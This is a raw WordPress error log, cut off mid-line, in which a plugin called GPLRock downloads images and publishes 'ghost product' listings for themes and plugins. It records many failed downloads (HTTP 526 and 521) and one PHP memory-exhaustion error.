image for product aventoura-travel-tour-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-353c8d70.webp [22-Mar-2026 01:34:36 UTC] GPLRock: Ghost product published with image - Product ID: aventoura-travel-tour-agency-elementor-template-kit [22-Mar-2026 01:34:37 UTC] GPLRock: Image downloaded successfully for product monsterinsights-pro-google-analytics-plugin-for-wp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0ecd7de.jpg [22-Mar-2026 01:34:37 UTC] GPLRock: Image downloaded successfully for product auzora-drone-aerial-photography-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a27c38ad.webp [22-Mar-2026 01:34:37 UTC] GPLRock: Using pre-downloaded image for product monsterinsights-pro-google-analytics-plugin-for-wp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0ecd7de.jpg [22-Mar-2026 01:34:37 UTC] GPLRock: Using pre-downloaded image for product auzora-drone-aerial-photography-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a27c38ad.webp [22-Mar-2026 01:34:37 UTC] GPLRock: Ghost product published with image - Product ID: monsterinsights-pro-google-analytics-plugin-for-wp [22-Mar-2026 01:34:37 UTC] GPLRock: Ghost product published with image - Product ID: auzora-drone-aerial-photography-elementor-template-kit [22-Mar-2026 01:34:38 UTC] GPLRock: Image downloaded successfully for product learnpress-woocommerce-payment-methods-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d2d3e7bd.jpg [22-Mar-2026 01:34:38 UTC] GPLRock: Image downloaded successfully for product autotrics-car-repair-auto-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4cd6cdc0.jpg [22-Mar-2026 01:34:38 UTC] GPLRock: Using pre-downloaded image for product learnpress-woocommerce-payment-methods-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d2d3e7bd.jpg [22-Mar-2026 01:34:38 UTC] GPLRock: Using pre-downloaded image for product autotrics-car-repair-auto-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4cd6cdc0.jpg [22-Mar-2026 01:34:38 UTC] GPLRock: Ghost product published with image - Product ID: autotrics-car-repair-auto-service-elementor-template-kit [22-Mar-2026 01:34:38 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-woocommerce-payment-methods-integration [22-Mar-2026 01:34:39 UTC] GPLRock: Image downloaded successfully for product archita-architecture-interior-design-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d9b64459.webp [22-Mar-2026 01:34:40 UTC] GPLRock: Image downloaded successfully for product memberpress-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-22e64570.jpg [22-Mar-2026 01:34:40 UTC] GPLRock: Using pre-downloaded image for product archita-architecture-interior-design-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d9b64459.webp [22-Mar-2026 01:34:40 UTC] GPLRock: Using pre-downloaded image for product memberpress-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-22e64570.jpg [22-Mar-2026 01:34:40 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-wordpress-plugin [22-Mar-2026 01:34:40 UTC] GPLRock: Ghost product published with image - Product ID: archita-architecture-interior-design-elementor-template-kit [22-Mar-2026 01:34:41 UTC] GPLRock: Image downloaded successfully for product woocommerce-memberships (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a5b4e00.jpg [22-Mar-2026 01:34:41 UTC] GPLRock: Image downloaded successfully for product aquassi-aquascape-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7f35faf8.webp [22-Mar-2026 01:34:42 UTC] GPLRock: Using pre-downloaded image for product aquassi-aquascape-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7f35faf8.webp [22-Mar-2026 01:34:42 UTC] GPLRock: Using pre-downloaded image for product woocommerce-memberships: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a5b4e00.jpg [22-Mar-2026 01:34:42 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-memberships [22-Mar-2026 01:34:42 UTC] GPLRock: Ghost product published with image - Product ID: aquassi-aquascape-shop-elementor-template-kit [22-Mar-2026 01:34:43 UTC] GPLRock: Image downloaded successfully for product appiah-app-landing-page-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-efc415c8.webp [22-Mar-2026 01:34:43 UTC] GPLRock: Using pre-downloaded image for product appiah-app-landing-page-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-efc415c8.webp [22-Mar-2026 01:34:43 UTC] GPLRock: Ghost product published with image - Product ID: appiah-app-landing-page-elementor-template-kit [22-Mar-2026 01:34:43 UTC] GPLRock: Image downloaded successfully for product marketo-ecommerce-multivendor-marketplace-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd3dcaed.avif [22-Mar-2026 01:34:43 UTC] GPLRock: Using pre-downloaded image for product marketo-ecommerce-multivendor-marketplace-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd3dcaed.avif [22-Mar-2026 01:34:43 UTC] GPLRock: Ghost product published with image - Product ID: marketo-ecommerce-multivendor-marketplace-woocommerce-wordpress-theme [22-Mar-2026 01:34:44 UTC] GPLRock: Image downloaded successfully for product appa-mobile-app-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46f58a71.webp [22-Mar-2026 01:34:45 UTC] GPLRock: Image downloaded successfully for product hotel-master-booking-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fcd27de8.jpg [22-Mar-2026 01:34:45 UTC] GPLRock: Using pre-downloaded image for product appa-mobile-app-startup-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46f58a71.webp [22-Mar-2026 01:34:45 UTC] GPLRock: Using pre-downloaded image for product hotel-master-booking-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fcd27de8.jpg [22-Mar-2026 01:34:45 UTC] GPLRock: Ghost product published with image - Product ID: hotel-master-booking-wordpress [22-Mar-2026 01:34:45 UTC] GPLRock: Ghost product published with image - Product ID: appa-mobile-app-startup-elementor-template-kit [22-Mar-2026 01:34:49 UTC] GPLRock: Image downloaded successfully for product agrinice-agriculture-organic-food-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cc5d31d5.webp [22-Mar-2026 01:34:49 UTC] GPLRock: Using pre-downloaded image for product agrinice-agriculture-organic-food-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cc5d31d5.webp [22-Mar-2026 01:34:49 UTC] GPLRock: Ghost product published with image - Product ID: agrinice-agriculture-organic-food-elementor-template-kit [22-Mar-2026 01:34:50 UTC] GPLRock: Image downloaded successfully for product rt-theme-19-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8aac526f.png [22-Mar-2026 01:34:50 UTC] GPLRock: Using pre-downloaded image for product rt-theme-19-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8aac526f.png [22-Mar-2026 01:34:50 UTC] GPLRock: Ghost product published with image - Product ID: rt-theme-19-multi-purpose-wordpress-theme [22-Mar-2026 01:34:51 UTC] GPLRock: Image downloaded successfully for product order-on-whatsapp-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-67c43138.jpg [22-Mar-2026 01:34:51 UTC] GPLRock: Using pre-downloaded image for product order-on-whatsapp-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-67c43138.jpg [22-Mar-2026 01:34:51 UTC] GPLRock: Ghost product published with image - Product ID: order-on-whatsapp-for-woocommerce [22-Mar-2026 11:59:35 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 2621440 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/litespeed-cache/src/db-optm.cls.php on line 16 [22-Mar-2026 11:59:39 UTC] GPLRock: Image download failed for product bwd-attractive-step-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 11:59:41 UTC] GPLRock: Image download failed for product bwd-attractive-step-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 11:59:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bwd-attractive-step-addon-for-elementor-32259.webp for product bwd-attractive-step-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 11:59:43 UTC] GPLRock: Image download failed for product bwd-attractive-step-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 11:59:45 UTC] GPLRock: Image download failed for product bwd-attractive-step-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 11:59:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bwd-attractive-step-addon-for-elementor-32259.webp for product bwd-attractive-step-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 11:59:48 UTC] GPLRock WARNING: Image download failed for product bwd-attractive-step-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/bwd-attractive-step-addon-for-elementor-32259.webp [22-Mar-2026 11:59:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bwd-attractive-step-addon-for-elementor [22-Mar-2026 11:59:48 UTC] GPLRock: Image download failed for product instant-blog-fast-simple-blog-php-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 11:59:50 UTC] GPLRock: Image download failed for product instant-blog-fast-simple-blog-php-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 11:59:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/instant-blog---fast--simple-blog-php-script-22899.webp for product instant-blog-fast-simple-blog-php-script after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 11:59:52 UTC] GPLRock: Image download failed for product instant-blog-fast-simple-blog-php-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 11:59:54 UTC] GPLRock: Image download failed for product instant-blog-fast-simple-blog-php-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 11:59:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/instant-blog---fast--simple-blog-php-script-22899.webp for product instant-blog-fast-simple-blog-php-script after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 11:59:56 UTC] GPLRock WARNING: Image download failed for product instant-blog-fast-simple-blog-php-script. URL: https://meldwp.com/wp-content/uploads/instant-blog---fast--simple-blog-php-script-22899.webp [22-Mar-2026 11:59:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: instant-blog-fast-simple-blog-php-script [22-Mar-2026 11:59:56 UTC] GPLRock: Image download failed for product woocommerce-brands-plugin-shop-by-manufacturers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 11:59:59 UTC] GPLRock: Image download failed for product woocommerce-brands-plugin-shop-by-manufacturers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-brands-plugin---shop-by-manufacturers-7858.webp for product woocommerce-brands-plugin-shop-by-manufacturers after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:00:01 UTC] GPLRock: Image download failed for product woocommerce-brands-plugin-shop-by-manufacturers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:03 UTC] GPLRock: Image download failed for product woocommerce-brands-plugin-shop-by-manufacturers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-brands-plugin---shop-by-manufacturers-7858.webp for product woocommerce-brands-plugin-shop-by-manufacturers after 3 attempts. HTTP Code: 521, Error: [22-Mar-2026 12:00:05 UTC] GPLRock WARNING: Image download failed for product woocommerce-brands-plugin-shop-by-manufacturers. URL: https://meldwp.com/wp-content/uploads/woocommerce-brands-plugin---shop-by-manufacturers-7858.webp [22-Mar-2026 12:00:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-brands-plugin-shop-by-manufacturers [22-Mar-2026 12:00:05 UTC] GPLRock: Image download failed for product advance-car-wash-booking-management-for-woocommerce (attempt 1/3). HTTP Code: 521, Error: . Retrying... [22-Mar-2026 12:00:07 UTC] GPLRock: Image download failed for product advance-car-wash-booking-management-for-woocommerce (attempt 2/3). HTTP Code: 521, Error: . Retrying... [22-Mar-2026 12:00:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advance-car-wash-booking-management-for-woocommerce-18453.webp for product advance-car-wash-booking-management-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:00:09 UTC] GPLRock: Image download failed for product advance-car-wash-booking-management-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:11 UTC] GPLRock: Image download failed for product advance-car-wash-booking-management-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advance-car-wash-booking-management-for-woocommerce-18453.webp for product advance-car-wash-booking-management-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:00:14 UTC] GPLRock WARNING: Image download failed for product advance-car-wash-booking-management-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/advance-car-wash-booking-management-for-woocommerce-18453.webp [22-Mar-2026 12:00:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: advance-car-wash-booking-management-for-woocommerce [22-Mar-2026 12:00:14 UTC] GPLRock: Image download failed for product eclass-learning-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:16 UTC] GPLRock: Image download failed for product eclass-learning-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eclass---learning-management-system-21131.webp for product eclass-learning-management-system after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:00:19 UTC] GPLRock: Image download failed for product eclass-learning-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:21 UTC] GPLRock: Image download failed for product eclass-learning-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eclass---learning-management-system-21131.webp for product eclass-learning-management-system after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:00:23 UTC] GPLRock WARNING: Image download failed for product eclass-learning-management-system. URL: https://meldwp.com/wp-content/uploads/eclass---learning-management-system-21131.webp [22-Mar-2026 12:00:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eclass-learning-management-system [22-Mar-2026 12:00:23 UTC] GPLRock: Image download failed for product simple-video-player-svplayer-plugin-for-wpbakery-and-elementor-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:25 UTC] GPLRock: Image download failed for product simple-video-player-svplayer-plugin-for-wpbakery-and-elementor-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-video-player-svplayer-plugin-for-wpbakery-and-elementor-builder-17484.webp for product simple-video-player-svplayer-plugin-for-wpbakery-and-elementor-builder after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:00:27 UTC] GPLRock: Image download failed for product simple-video-player-svplayer-plugin-for-wpbakery-and-elementor-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:29 UTC] GPLRock: Image download failed for product simple-video-player-svplayer-plugin-for-wpbakery-and-elementor-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-video-player-svplayer-plugin-for-wpbakery-and-elementor-builder-17484.webp for product simple-video-player-svplayer-plugin-for-wpbakery-and-elementor-builder after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:00:31 UTC] GPLRock WARNING: Image download failed for product simple-video-player-svplayer-plugin-for-wpbakery-and-elementor-builder. URL: https://meldwp.com/wp-content/uploads/simple-video-player-svplayer-plugin-for-wpbakery-and-elementor-builder-17484.webp [22-Mar-2026 12:00:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: simple-video-player-svplayer-plugin-for-wpbakery-and-elementor-builder [22-Mar-2026 12:00:32 UTC] GPLRock: Image download failed for product perfex-crm-chat-tickets-app-for-support-board (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:34 UTC] GPLRock: Image download failed for product perfex-crm-chat-tickets-app-for-support-board (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/perfex-crm-chat--tickets-app-for-support-board-33603.webp for product perfex-crm-chat-tickets-app-for-support-board after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:00:36 UTC] GPLRock: Image download failed for product perfex-crm-chat-tickets-app-for-support-board (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:38 UTC] GPLRock: Image download failed for product perfex-crm-chat-tickets-app-for-support-board (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/perfex-crm-chat--tickets-app-for-support-board-33603.webp for product perfex-crm-chat-tickets-app-for-support-board after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:00:40 UTC] GPLRock WARNING: Image download failed for product perfex-crm-chat-tickets-app-for-support-board. URL: https://meldwp.com/wp-content/uploads/perfex-crm-chat--tickets-app-for-support-board-33603.webp [22-Mar-2026 12:00:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: perfex-crm-chat-tickets-app-for-support-board [22-Mar-2026 12:00:40 UTC] GPLRock: Image download failed for product woocommerce-product-featured-video-content-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:42 UTC] GPLRock: Image download failed for product woocommerce-product-featured-video-content-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-featured-video-content-plugin-12831.webp for product woocommerce-product-featured-video-content-plugin after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:00:45 UTC] GPLRock: Image download failed for product woocommerce-product-featured-video-content-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:47 UTC] GPLRock: Image download failed for product woocommerce-product-featured-video-content-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-featured-video-content-plugin-12831.webp for product woocommerce-product-featured-video-content-plugin after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:00:49 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-featured-video-content-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-featured-video-content-plugin-12831.webp [22-Mar-2026 12:00:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-featured-video-content-plugin [22-Mar-2026 12:00:49 UTC] GPLRock: Image download failed for product woocommerce-products-compare (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:51 UTC] GPLRock: Image download failed for product woocommerce-products-compare (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-products-compare-12129.webp for product woocommerce-products-compare after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:00:53 UTC] GPLRock: Image download failed for product woocommerce-products-compare (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:55 UTC] GPLRock: Image download failed for product woocommerce-products-compare (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:00:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-products-compare-12129.webp for product woocommerce-products-compare after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:00:57 UTC] GPLRock WARNING: Image download failed for product woocommerce-products-compare. URL: https://meldwp.com/wp-content/uploads/woocommerce-products-compare-12129.webp [22-Mar-2026 12:00:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-products-compare [22-Mar-2026 12:00:58 UTC] GPLRock: Image downloaded successfully for product flickomatic-automatic-post-generator-and-flickr-auto-poster-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8637c13f.webp [22-Mar-2026 12:00:58 UTC] GPLRock: Using pre-downloaded image for product flickomatic-automatic-post-generator-and-flickr-auto-poster-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8637c13f.webp [22-Mar-2026 12:00:58 UTC] GPLRock: Ghost product published with image - Product ID: flickomatic-automatic-post-generator-and-flickr-auto-poster-plugin-for-wordpress [22-Mar-2026 12:01:03 UTC] GPLRock: Image download failed for product fundro-charity-nonprofit-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:03 UTC] GPLRock: Image download failed for product july-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:05 UTC] GPLRock: Image download failed for product fundro-charity-nonprofit-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:05 UTC] GPLRock: Image download failed for product july-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fundro---charity-nonprofit-wordpress-theme-25075.webp for product fundro-charity-nonprofit-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/july--ecommerce-wordpress-theme-11557.webp for product july-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:08 UTC] GPLRock: Image download failed for product fundro-charity-nonprofit-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:08 UTC] GPLRock: Image download failed for product july-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:10 UTC] GPLRock: Image download failed for product july-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:10 UTC] GPLRock: Image download failed for product fundro-charity-nonprofit-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/july--ecommerce-wordpress-theme-11557.webp for product july-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:12 UTC] GPLRock WARNING: Image download failed for product july-ecommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/july--ecommerce-wordpress-theme-11557.webp [22-Mar-2026 12:01:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fundro---charity-nonprofit-wordpress-theme-25075.webp for product fundro-charity-nonprofit-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:12 UTC] GPLRock WARNING: Image download failed for product fundro-charity-nonprofit-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fundro---charity-nonprofit-wordpress-theme-25075.webp [22-Mar-2026 12:01:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: july-ecommerce-wordpress-theme [22-Mar-2026 12:01:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fundro-charity-nonprofit-wordpress-theme [22-Mar-2026 12:01:12 UTC] GPLRock: Image download failed for product evendo-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:12 UTC] GPLRock: Image downloaded successfully for product bikersclub-motorcycle-club-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b7562179.webp [22-Mar-2026 12:01:12 UTC] GPLRock: Using pre-downloaded image for product bikersclub-motorcycle-club-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b7562179.webp [22-Mar-2026 12:01:12 UTC] GPLRock: Ghost product published with image - Product ID: bikersclub-motorcycle-club-woocommerce-wordpress-theme [22-Mar-2026 12:01:12 UTC] GPLRock: Image download failed for product snakepit-a-rock-and-metal-oriented-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:14 UTC] GPLRock: Image download failed for product evendo-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:14 UTC] GPLRock: Image download failed for product snakepit-a-rock-and-metal-oriented-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evendo---event--conference-wordpress-theme-11099.webp for product evendo-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:16 UTC] GPLRock: Image download failed for product evendo-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/snakepit---a-rock-and-metal-oriented-music-wordpress-theme-27766.webp for product snakepit-a-rock-and-metal-oriented-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:16 UTC] GPLRock: Image download failed for product snakepit-a-rock-and-metal-oriented-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:18 UTC] GPLRock: Image download failed for product evendo-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:18 UTC] GPLRock: Image download failed for product snakepit-a-rock-and-metal-oriented-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evendo---event--conference-wordpress-theme-11099.webp for product evendo-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:20 UTC] GPLRock WARNING: Image download failed for product evendo-event-conference-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/evendo---event--conference-wordpress-theme-11099.webp [22-Mar-2026 12:01:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: evendo-event-conference-wordpress-theme [22-Mar-2026 12:01:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/snakepit---a-rock-and-metal-oriented-music-wordpress-theme-27766.webp for product snakepit-a-rock-and-metal-oriented-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:01:20 UTC] GPLRock WARNING: Image download failed for product snakepit-a-rock-and-metal-oriented-music-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/snakepit---a-rock-and-metal-oriented-music-wordpress-theme-27766.webp [22-Mar-2026 12:01:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: snakepit-a-rock-and-metal-oriented-music-wordpress-theme [22-Mar-2026 12:01:20 UTC] GPLRock: Image download failed for product grav-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:01:21 UTC] GPLRock: Image download failed for product invia-responsive-corporate-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 